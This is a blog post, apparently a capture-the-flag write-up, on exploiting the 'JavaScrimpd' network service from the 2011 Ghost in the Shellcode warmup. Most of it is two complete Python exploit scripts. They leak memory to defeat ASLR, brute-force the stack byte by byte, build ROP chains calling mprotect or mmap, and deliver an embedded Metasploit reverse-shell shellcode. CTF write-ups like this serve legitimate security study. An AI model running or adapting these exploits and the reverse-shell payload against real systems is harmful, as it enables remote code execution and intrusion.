Friday, January 14, 2011

ShmooCon CTF Warmup Contest - JavaScrimpd

Last week-end was ShmooCon CTF Warmup Contest (aka Ghost in the Shellcode 2011). Three challenges, the last one being an ELF binary + hostname of a server.

Congrats to awesie/zoaedk & tylerni7 of team PPP for solving it pretty quickly. And since they explained the level pretty well, I really invite you to read their solution.

Valuable binary information


In addition to reading the SSH banner, the binary informs us that it has been compiled under Ubuntu with gcc 4.3.3:
$ objdump -s -j .comment 063ad0c8271898d6c5e3e83701211f6-JavaScrimpd

063ad0c8271898d6c5e3e83701211f6-JavaScrimpd:     file format elf32-i386

Contents of section .comment:
 0000 4743433a 20285562 756e7475 20342e34  GCC: (Ubuntu 4.4
 0010 2e332d34 7562756e 74753529 20342e34  .3-4ubuntu5) 4.4
 0020 2e3300                               .3.

and that it's using libmozjs from xulrunner package 1.9.2.13:
$ readelf -d 6063ad0c8271898d6c5e3e83701211f6-JavaScrimpd
Dynamic section at offset 0x1f10 contains 23 entries:
  Tag        Type             Name/Value
 0x00000001 (NEEDED)          Shared library: [libmozjs.so]
 0x00000001 (NEEDED)          Shared library: [libc.so.6]
 0x0000000f (RPATH)           Library rpath: [/usr/lib/xulrunner-1.9.2.13/]
[...]
These information are really valuable to work with the same libmozjs.so as the server, in order to ease remote exploitation.


Exploit using send() memory leak


Using the same techniques I made my own exploit and challenged myself to make it work under ASLR in addition to NX. In order to do that, we need to:
  • automatically calculate remote base address of libmozjs using JS's socket.send() memory leak, by trying several addresses: last 12 bits should be the same, decrementing their offset should give same base address
  • send a payload and get its address in the heap, again using socket.send() memory leak to find heap1/heap2 addresses as explained by awesie
I tried to make the exploit code portable and verbose enough to understand. Also, you can give any shellcode - I used a very common shell_reverse_tcp from metasploit.

Exploit (3.py):
#!/usr/bin/env python
# Solution for shmoocon barcode/ghost in the shellcode 2011, challenge #3
# Based on awesie/tylerni7 solution http://ppp.cylab.cmu.edu/wordpress/?p=410
# Automatically finds addresses => ASLR proof!
from sys import argv, exit
from struct import pack, unpack
from socket import *

# ./3.py [host (default localhost)] [port (default 2426)]
host = argv[1] if len(argv)>1 else "localhost"
port = int(argv[2]) if len(argv)>2 else 2426

# pivot gadget - leave (mov esp,ebp ; pop ebp) ; ret
pivot_leave = 0x8048c56

# offset of mprotect@PLT in libmozjs
mprotect_plt_offset = 0xEEF0
# ebx value to call mprotect through GOT/PLT of shared library
# obtained these values from libmozjs.so:.text:001359A2  add ebx, 1848Ah
libmozjs_ebx = 0x1359A2 + 0x1848A

# some addresses of functions found locally in the memory leak
mask = 0x00000FFF
addr1 = 0xb7ecc7a0
addr2 = 0xb7fc7640
addr3 = 0xb7ec9560
# with the following base address for libmozjs
ba = 0xb7e78000

def connect():
  s = socket(AF_INET, SOCK_STREAM)
  s.connect((host,port))
  return s

def leak_js(length=0x100, string="AAAA", timout=1):
  s = connect()
  s.settimeout(timout)
  s.send("a=new Socket();a.send('%s',%i);a.recv(0);" % (string, length))
  r = ''
  try:
    while len(r)<length:
      r += s.recv(length)
  except timeout, e:
    pass
  s.close()
  return r

def build_js(p, sendsize, recvsize):
  js  = "a=new Socket();"
  js += "s='%s';" % ("".join("\\x%02x"%ord(c) for c in p))
  js += "a.send(s,%i);" % sendsize
  js += "a.recv(%i);" % recvsize
  return (js+"//").ljust(1024,"X")

def get_heap_addr(send, leak=64):
  # 00000000  41 42 42 42 00 14 e8 b7  77 00 20 00 19 00 00 00  |ABBB....w. .....|
  # 00000010  00 00 00 00 60 e4 00 01  00 23 07 08 c8 3d 07 08  |....`....#...=..|
  #            heap1       heap2, points to buffer=ABBB
  # obtain heap1/heap2 addresses with simple buffer
  mem = leak_js(0x20, "ABBB")
  heap1 = unpack("<I", mem[-8:-4])[0]
  heap2 = unpack("<I", mem[-4:])[0]
  if mem[0:4]=="ABBB" and (heap1>>16)==(heap2>>16):
    higher_bytes = pack("<H", heap1>>16)
    # for some length, heap doesn't display heap1/heap2 addresses
    # so try to pad our payload until it displays it and we find it
    for i in range(32):
      s = connect()
      s.send(build_js("A"+"B"*(send-1), send+leak, 0))
      mem = s.recv(send+leak)
      s.close()
      # try to find heap1/heap2 by matching higher bytes found previously
      h = mem.find(higher_bytes, send)
      heap1 = unpack("<I", mem[h-2:h+2])[0]
      heap2 = unpack("<I", mem[h+2:h+6])[0]
      if (heap1>>16)==(heap2>>16):
        return heap2, i
      send += 1
  print 'unable to find heap address of buffer'
  exit(1)

def get_libmozjs_ba():
  mem = leak_js(0x5000)
  guess1, guess2, guess3 = 0,0,0
  for i in range(0,len(mem),4):
    a = unpack("<I", mem[i:i+4])[0]
    # try to match addresses we found locally and for
    # which we calculated offset to library base address
    if (a & mask)==(addr1 & mask):
      guess1 = a - (addr1 - ba)
    elif (a & mask)==(addr2 & mask):
      guess2 = a - (addr2 - ba)
    elif (a & mask)==(addr3 & mask):
      guess3 = a - (addr3 - ba)
    if guess1>0 and guess2>0 and guess3>0 and guess1==guess2==guess3:
      return guess1
  print 'unable to get libmozjs base address'
  exit(1)

def exploit(SC):
  # rop payload (in heap)
  rop  = "MPRO"
  rop += "RETN" # where to return after call
  rop += "HEAP" # const void *addr
  rop += pack("<I", 0x1000) # size_t len
  rop += pack("<I", 0x7) # int prot

  libmozjs_ba = get_libmozjs_ba()
  print "Assuming libmozjs base address at 0x%08x" % libmozjs_ba

  leak = 64
  heap, pad = get_heap_addr(len(rop+SC), leak)
  print "Assuming heap buffer at 0x%08x with %i padding" % (heap, pad)
  rop += "A"*pad

  # mprotect@plt offset
  mprotect = libmozjs_ba + mprotect_plt_offset
  # fix ebx for call
  ebx = libmozjs_ba + libmozjs_ebx

  # adjust heap and return addresses
  rop = rop.replace("MPRO", pack("<I",mprotect))
  rop = rop.replace("HEAP", pack("<I",heap))
  rop = rop.replace("RETN", pack("<I",heap+len(rop)))

  # stack-based buffer overflow
  p  = "A"*1052
  p += pack("<I",ebx) # ebx
  p += pack("<I",heap-4) # sebp, address of new stack
  p += pack("<I",pivot_leave) # seip, pivot (leave; ret)

  s = connect()
  s.send(build_js(rop+SC, len(rop+SC)+leak, len(p)))
  s.send(p)
  s.close()
  print "Done. Have shell?"

# Shellcode to use
# msfpayload linux/x86/shell_reverse_tcp LHOST="127.0.0.1" LPORT="1337" R |hexdump -ve '"\\\x" 1/1 "%02x"'; echo;
SC = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x7f\x00\x00\x01\x66\x68\x05\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

exploit(SC)

It gives:
$ ./3.py
Assuming libmozjs base address at 0xb7673000
Assuming heap buffer at 0x08ccfe30 with 0 padding
Done. Have shell?
# and new connection appears in the listening netcat


Exploit not using send() memory leak: stack brute-force


Back to recv() stack-based buffer overflow. Right after the saved instruction pointer (seip) is the first arg of the function - a pointer to JS context - which is used before reaching ret (by JS_strdup() and JS_newstring()). This is why we could not overwrite it and have a regular exploitation and had to use a leave/ret stack pivot into our buffer inside the JS code with our new stack.

We could overwrite context if we had its value. But how to get it without any memory leak? We can just brute-force it as if it was a stack cookie (see pi3's article in phrack #67). To distinguish good from bad results, we can add a send("it works") in the JS code after the recv(). If we receive "it works" it means we correctly guessed context value, timeout meaning we failed. But doing this we also smash the saved base pointer (sebp) and saved instruction pointer (seip), so we need their value first. How? Same method, brute-force. All in all we have a 12 bytes byte per byte brute-force.

Note: the stack brute-force works here because the server uses recv() (no extra character being added like with fgets()) and also because it only forks() and does not execve() itself again (in that case ASLR would change all addresses). In local it takes about 2 minutes to brute-force the 12-bytes (min 12 tries, max 256*12=3072 tries).

What next? After using a pop+ret gadget to skip context and other stack variables that are unusable, we now have a regular stack-based buffer overflow. We can then return to send@PLT to send us back any memory area! The only problem is to provide the correct file descriptor, the one of our socket. Actually we can get it by using JS send(socket.fileno) before calling recv(), so we can send our buffer overflow payload using its value.

So now we have an arbitrary memory leak. Let's not fall into the first solution using libmozjs and choose another approach. Since the binary is not position independent, we know where it is mapped in memory, especially its GOT (Global Offset Table) section. There, we can find function pointers already resolved (since already called) and directly pointing to the libc: signal(), recv(), listen(), setuid(), etc. Assuming we have the same libc (we guessed Ubuntu version), we can then deduce remote libc base address.

What if it is not the same libc but an obscure and different one? We can guess its base address and leak its content remotely using our arbitrary memory leak. Once fully obtained, we can read its content and find what we need.

Now that we have access to any libc function, many solutions are possible. I chose to mmap() an rwx area, download a shellcode over the socket using recv() (with the same socket fileno leak I explained before) and return to it.

Again, I tried to make the exploit code portable and verbose enough to understand. Again, you can give any shellcode, I used the same connect-back as before.

Exploit (3b.py):
#!/usr/bin/env python
# Solution for shmoocon barcode/ghost in the shellcode 2011, challenge #3
# It does not use JS send() memory leak but brute-forces the stack (like an
# SSP brute-force), so it becomes a regular stack-based buffer overflow.
# We use send() to leak remote process memory and use this to find remote libc
# base address by looking at resolved libc functions in binary's .got section.
# Finally mmap() ourselves an rwx area, recv() a shellcode and return to it.
from sys import argv, exit
from struct import pack, unpack
from time import sleep
from socket import *

# ./3b.py [host (default localhost)] [port (default 2426)]
host = argv[1] if len(argv)>1 else "localhost"
port = int(argv[2]) if len(argv)>2 else 2426

pop_11 = 0x8049812 # add esp 0x1c (28) ; pop ebx ; pop esi ; pop edi ; pop ebp ;;
pop_4 = 0x8049815 # pop ebx ; pop esi ; pop edi ; pop ebp ;;
send_plt = 0x08048E98
recv_plt = 0x08048CB8
exit_plt = 0x08048F58

got_plt_start, got_plt_end = 0x0804AFF4, 0x0804B0C8
# Some libc functions already resolved by GOT/PLT
# by the time we smash the stack
signal_got = 0x0804B00C
recv_got   = 0x0804B014
listen_got = 0x0804B01C

# Functions in my libc and its base address during a local run
my_signal = 0xb7d48530
my_recv   = 0xb7deccb0
my_listen = 0xb7decc70
my_mmap   = 0xb7de7ee0
my_libc_ba = 0xb7d1e000

def connect():
  s = socket(AF_INET, SOCK_STREAM)
  s.connect((host,port))
  return s

def alive():
  s = connect()
  s.send("a=new Socket();a.send('ping\\n');")
  r = s.recv(5)
  s.close()
  return r=='ping\n'

def leak_js(length=0x100, string="AAAA", timout=1):
  s = connect()
  s.settimeout(timout)
  s.send("a=new Socket();a.send('%s',%i);a.recv(0);" % (string, length))
  r = ''
  try:
    while len(r)<length:
      r += s.recv(length)
  except timeout, e:
    pass
  s.close()
  return r

def try_byte(current, byte, timout=0.3):
  s = connect()
  s.settimeout(timout)
  p = "A"*(1056) + current + byte
  found = False
  try:
    s.send(("a=new Socket();a.recv("+str(len(p))+");a.send('HAI\\n')//").ljust(1024,"X"))
    s.send(p)
    found = s.recv(4)=="HAI\n"
  except timeout, e:
    pass
  s.close()
  return found

def find_byte(current, first_check=[]):
  timout = 0.2 if host=="localhost" else 0.6
  found = False
  while not found:
    for i in first_check+list(set(range(256))-set(first_check)):
      if try_byte(current, chr(i), timout):
        found = True
        print " * found byte 0x%02x" % i
        return chr(i)
    if not found:
      timout *= 2
      if alive():
        print "Not found, retrying with timeout %.1f" % timout
      else:
        print "Target dead?"
        exit(1)

def bf_stack():
  print "Brute-forcing the stack to get sebp, seip & context addresses"
  sebp = ''
  sebp += find_byte(sebp,[0x68])
  sebp += find_byte(sebp,[0xeb])
  sebp += find_byte(sebp,[0xff])
  sebp += find_byte(sebp,[0xbf])
  seip = ''
  seip += find_byte(sebp+seip,[0xa7])
  seip += find_byte(sebp+seip,[0x47])
  seip += find_byte(sebp+seip,[0xee])
  seip += find_byte(sebp+seip,[0xb7])
  context = ''
  context += find_byte(sebp+seip+context,[0xd0])
  context += find_byte(sebp+seip+context,[0x56])
  context += find_byte(sebp+seip+context,[0x05])
  context += find_byte(sebp+seip+context,[0x08])
  sebp, seip, context = unpack("<I",sebp)[0], unpack("<I",seip)[0], unpack("<I",context)[0]
  print "Found: sebp, seip, context = 0x%08x, 0x%08x, 0x%08x" % (sebp, seip, context)
  return (sebp, seip, context)

def prepare_payload_rop():
  p = "A"*1060
  p += pack("<I", pop_11) # seip
  p += pack("<I", context) # do not smash context
  p += pack("<I", 0)*3 # unused
  p += pack("<I", context-4) # something writeable
  p += pack("<I", 0)*(11-5) # unused
  return p # after that goes the rop payload

def leak_mem(start,length):
  p  = prepare_payload_rop()
  p += pack("<I", send_plt)
  p += pack("<I", pop_4)
  p += "FDNO" # int fd
  p += pack("<I", start) # void *buf
  p += pack("<I", length) # size_t n
  p += pack("<I", 0) # int flags
  p += pack("<I", exit_plt)

  s = connect()
  s.send(("a=new Socket();a.send(a.fileno);a.recv("+str(len(p))+");//").ljust(1024,"X"))
  fileno = unpack("<I", s.recv(4))[0]
  p = p.replace("FDNO", pack("<I",fileno))
  s.send(p)
  r = ''
  try:
    while len(r)<length:
      r += s.recv(length)
  except timeout, e:
    pass
  s.close()
  return r

def get_libc_ba():
  mem = leak_mem(got_plt_start, got_plt_end-got_plt_start)

  signal = unpack("<I", mem[signal_got-got_plt_start:signal_got-got_plt_start+4])[0]
  recv   = unpack("<I", mem[recv_got-got_plt_start:recv_got-got_plt_start+4])[0]
  listen = unpack("<I", mem[listen_got-got_plt_start:listen_got-got_plt_start+4])[0]

  guess1 = signal - (my_signal - my_libc_ba)
  guess2 = recv   - (my_recv   - my_libc_ba)
  guess3 = listen - (my_listen - my_libc_ba)
  if guess1==guess2==guess3:
    return guess1
  print "Could not find remote libc base address - maybe different version?"
  print "You can try to leak it using leak_mem() progressively, then explore it to find needed offsets you need"
  exit(1)

def exploit(SC, area=0x13370000, size=0x10000):
  p  = prepare_payload_rop()

  # mmap an rwx area at 0x13370000
  p += pack("<I", libc + (my_mmap - my_libc_ba))
  p += pack("<I", pop_11)
  p += pack("<I", area) # void *addr
  p += pack("<I", size) # size_t length
  p += pack("<I", 0x7) # int prot - PROT_READ(0x1) | PROT_WRITE(0x2) | PROT_EXEC(0x4)
  p += pack("<I", 0x22) # int flags - MAP_ANONYMOUS(0x20) | MAP_PRIVATE(0x02)
  p += pack("<I", 0xffffffff) # int fd - MAP_ANONYMOUS => -1
  p += pack("<I", 0) # off_t offset
  p += pack("<I", 0)*(11-6) # unused

  # receive a shellcode in it
  p += pack("<I", recv_plt)
  p += pack("<I", pop_4)
  p += "FDNO" # int fd
  p += pack("<I", area) # void *buf
  p += pack("<I", len(SC)) # size_t n
  p += pack("<I", 0) # int flags

  # jump to it
  p += pack("<I", area)

  s = connect()
  s.send(("a=new Socket();a.send(a.fileno);a.recv("+str(len(p))+");//").ljust(1024,"X"))
  fileno = unpack("<I", s.recv(4))[0]
  p = p.replace("FDNO", pack("<I",fileno))
  s.send(p)
  s.send(SC)
  s.close()
  print "Done. Have shell?"

# Shellcode to use
# msfpayload linux/x86/shell_reverse_tcp LHOST="127.0.0.1" LPORT="1337" R |hexdump -ve '"\\\x" 1/1 "%02x"'; echo;
SC = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x7f\x00\x00\x01\x66\x68\x05\x39\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

sebp, seip, context = bf_stack()
libc = get_libc_ba()
print "Remote libc at 0x%08x" % libc
exploit(SC)
This exploitation also bypasses ASLR, but takes more time because of the brute-force. Anyway I like it because we don't have to make any assumption about remote libraries thanks to the arbitrary memory leak using send(). If remote libraries are unknown, we can find where they are from the GOT then dump and analyze them.


Thank you ShmooCon and Ghost in the Shellcode for this cool challenge!

2 comments:

  1. Nice post! The objdump trick is cool.

    In 3.py, mprotect() will fail if *addr is not multiple of page_size, suggest to use (heap & 0xfffff000) instead of heap in rop stuff

    ReplyDelete
  2. nice alternative way! byte-per-byte brute-force is not bad at all :)

    ReplyDelete